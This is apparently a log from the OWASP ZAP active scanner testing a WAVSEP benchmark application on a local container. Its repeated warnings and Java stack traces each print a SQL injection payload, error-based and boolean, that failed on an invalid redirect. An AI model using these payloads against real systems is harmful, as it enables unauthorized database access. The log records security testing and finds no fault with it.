org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (3877=3877) THEN 3877 ELSE 3877*(SELECT 3877 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT (CASE WHEN (3877=3877) THEN 3877 ELSE 3877*(SELECT 3877 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681628 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (2656=6215) THEN 2656 ELSE 2656*(SELECT 2656 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (2656=6215) THEN 2656 ELSE 2656*(SELECT 2656 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681628 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (1804=5587) THEN 1804 ELSE 1804*(SELECT 1804 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT (CASE WHEN (1804=5587) THEN 1804 ELSE 1804*(SELECT 1804 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681629 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) AND (SELECT 7731 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7731=7731,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3336=3336] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) AND (SELECT 7731 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7731=7731,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3336=3336 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681630 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com AND (SELECT 4737 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4737=4737,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com AND (SELECT 4737 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4737=4737,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681630 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND (SELECT 5984 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5984=5984,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (5904=5904] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND (SELECT 5984 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5984=5984,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (5904=5904 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681631 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') AND (SELECT 9234 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9234=9234,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('hnxU'='hnxU] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') AND (SELECT 9234 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9234=9234,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('hnxU'='hnxU at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681632 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT 9444 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9444=9444,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT 9444 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9444=9444,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681633 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' AND (SELECT 4943 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4943=4943,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'akXS'='akXS] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' AND (SELECT 4943 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4943=4943,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'akXS'='akXS at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681633 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' AND (SELECT 4461 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4461=4461,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' AND (SELECT 4461 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4461=4461,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681634 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND (SELECT 1521 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1521=1521,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('EiLS'='EiLS] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND (SELECT 1521 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1521=1521,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('EiLS'='EiLS at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681635 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com AND (SELECT 6355 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6355=6355,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- VPUK] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com AND (SELECT 6355 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6355=6355,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- VPUK at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681635 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND (SELECT 9423 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9423=9423,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'SBnU'='SBnU] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND (SELECT 9423 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9423=9423,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'SBnU'='SBnU at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 